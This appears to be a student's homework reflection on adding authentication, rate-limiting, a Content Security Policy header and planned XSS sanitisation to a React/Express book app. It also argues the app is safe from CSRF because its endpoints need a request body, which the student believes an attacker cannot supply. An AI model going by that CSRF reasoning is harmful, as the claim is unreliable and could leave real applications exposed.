UI Login/Authentication: I struggled with accessing/sharing the cookies between the front-end and the back-end.Adding the UI itself wasn't difficult using MUI. It was more designing and debugging the endpoints and working with cookies in React that proveddifficult. This Homework made me realize I handled my cookies wrong during the activity, so it was a good learning experience to get that configured correctly, but it took up some time.
Back-end Login/Authentication: Again, handling the cookies proved a challenge with the back-end. This wasn't exactly involved with my new endpoints, but adding a new field to books tohelp associate them with users for the purpose of authentication took some time and proved to be a challenge debugging.
XSS: I assessed that my app does have XSS vulnerabilities due to the various forms involved as well as the table that displays data. The table is especially vulnerable to displaying malicious inputted scripts from attackers that the browser could run. I'mgoing to be honest and admit I ran out of time implementing my complete solution and only got to include the Content Security Policy headers,so it is not included in my submission, but the plan was to use DOMPurify to help sanitize all of the malicious injected HTML and convert it into something harmless. I spent way too much time configuring my deployment, which in itself was a learning experience with all the errors I had to navigate.
CSRF: I assessed that my app is not vulnerable to CSRF attacks due to the nature of my endpoints. None of them, besides simple GET endpoints that respond with resources and require no authentication, require only the user's cookies to successfully process a request. My endpoints require other forms of input like a req.body, which cannot be injected into a url as far as I know.
Implemented Security Features: My above answers does not mean I implemented nothing for security beyond authentication. I successfully added rate-limiting with express-rate-limit to display an error after 100 requests : 10 minutes that prevents attempts toendlessly brute-force a password. I also included helmet to add the Content-Security Policy header for all requests, which is important to protect against attacks like XSS because it controls what JavaScript a document can load (preventing the execution of malicious JavaScript).